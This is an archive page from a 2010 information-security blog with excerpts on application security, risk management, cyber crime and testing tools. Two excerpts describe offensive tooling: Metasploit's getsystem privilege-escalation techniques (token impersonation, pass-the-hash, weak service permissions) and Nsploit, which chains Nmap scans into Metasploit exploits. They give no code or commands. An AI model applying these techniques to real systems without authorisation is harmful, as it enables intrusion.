Monthly Archives: February 2010

Force Multipliers for Web Application Security

Posted on February 25, 2010 by John Reno in Main | Leave a comment

Over the last several years many analysts, including Gartner, have identified application security as the area presenting the most significant risk to companies with internet facing applications. As a result a number of best practices have emerged, ranging from secure coding practices and developer training from organizations such as Microsoft to change management driven black-box testing. However, one area where I see developers and security teams consistently struggle (and often introduce significant vulnerabilities) in terms of application security is with … →

Would you Believe it? Twitter as a Way of Coping With Infosec Information Overload

Posted on February 21, 2010 by John Reno in Main | Leave a comment

The job of keeping up with latest threats and vulnerabilities is a daunting task for security professionals. There are many excellent resources for both threats (for example, Symantec DeepSight data feeds) and vulnerabilities (DHS National Cyber Security Division/U.S.-CERT). But it still requires skilled human effort to synthesize which assets in an organization are impacted by the threats, and interpret vulnerability information to understand how likely the threats are to the business, given the current controls that exist. As I’ve discussed … →

Web Application Trends and Predictions from Breach Security

Posted on February 19, 2010 by Nathan Drier Leave a comment

Here is an interesting recap of some of the top web incidents of 2009, along with some projections for 2010. It’s done by one of the guys at Breach Security. It includes a recap and some technical details on the TJX hack, Time’s ‘Most Influential Person’ poll abuse, fun with Twitter, and more. A good read and some good perspective. You need to disclose some info to download – but its worth it. http://www.breach.com/resources/whitepapers/top-web-incidents-2009.html

Healthcare sector investments in information security make good business sense

Posted on February 19, 2010 by John Reno in Main | Leave a comment

While companies in the healthcare sector focus on HITECH act compliance and meaningful use and healthcare reform dominates the headlines, it is worthwhile to consider some of the business reasons for investing in a strong information security program. Modernization of the healthcare payments system is one big area where the potential for cost savings are dramatic. Both providers and healthcare plans stand to benefit. For healthcare plans the benefits include easier reconciliation of payments and remittances as well as better … →

Getsystem, Privilege Escalation via Metasploit

Posted on February 18, 2010 by jhaddix Leave a comment

A few weeks ago Chris Gates (ala Attack Research/Carnal Ownage) and Joshua Gauthier showed some quick snippets of Metasploit‘s Getsystem extension. Getsystem is meterpreter’s new (windows) privilege escalation extension used in the priv module. Getsystem uses several techniques for priv escalation: Windows Impersonation Tokens (fixed by MS09-012) Abusing LSASS via token passing (Pass-the-Hash) which requires Administrator anyway. Exploiting weak permissions (read and write) in the services (most of them by default run as SYSTEM, if you are lucky they run … →

More Cyber Criminal Activity

Posted on February 18, 2010 by John Reno in Main | Leave a comment

This morning the Washington Post once again reported a widespread and ongoing set of attacks sponsored by a cybercriminal organization based in Eastern Europe. Amit Yoran of Netwitness was quoted as saying, “The traditional security approaches of intrusion-detection systems and anti-virus software are by definition inadequate for these types of sophisticated threats,” Yoran said. “The things that we — industry — have been doing for the past 20 years are ineffective with attacks like this. That’s the story.” I have … →

Nsploit: Nmap grows some teeth

Posted on February 12, 2010 by jhaddix 3 Comments

Ryan Linn has started a project to bridge Nmap Scans all the way to exploitation using Metasploit. Similar to the db_autopwn via fasttrack script (available in Backtrack 4), Nsploit does even more granular service level Nmap scanning to identify vulnerable software versions and map corresponding exploits. It then passes these to Metasploit and launches the pain at your target box. It Uses Nmap’s NSE’s to trigger Metasploit commands via XMLRPC. Anything we can identify with an Nmap Script we can … →

IT Risk Management

Posted on February 11, 2010 by John Reno in Main | 2 Comments

In my last few posts I mentioned using risk management as an effective mechanism for combating cyber crime. A number of readers from the LinkedIn Information Security Group asked about recommendations for improving their risk management processes: “In my corporation risk management is mostly controlled by finance. We can’t seem to get a discussion of IT risk, particularly cyber crime, on the executive staff agenda. Do you have any ideas to improve our situation?” “We invested in the COSO framework … →

Advanced persistent threats – how organizations can keep pace with the growing sophistication of cyber crime

Posted on February 5, 2010 by John Reno in Main | 1 Comment

Threats posed by cyber crime have increased dramatically in the past year. Yesterday the Washington Post announced that Google has enlisted the help of the NSA to combat cyber crime attacks directed at them and other U.S. corporations. While this is sure to generate privacy concerns in the user community, it is more importantly a visible indicator that cooperation is one of the more important factors in combating cyber crime. In fact in the last 6-12 months there has been … →

OWASP Live CD

Posted on February 4, 2010 by Nathan Drier Leave a comment

I need to express my love for OWASP’s Live CD (aka OWASP Web Testing Environment). Its backtrack-like philosophy of piling in the web-security tools is simple, but the end result is a wonderful testing environment. Firefox comes action-packed with web testing addons, a pile of proxies (burp, paros, rat), a multitude of scanners (grendel,w3af), and an array of other tools. While the forums and tutorials on the site are a bit slim at the moment, its a great start to … →

1 2 Next »

Monthly Archives: February 2010

Search

Follow Us!

Admin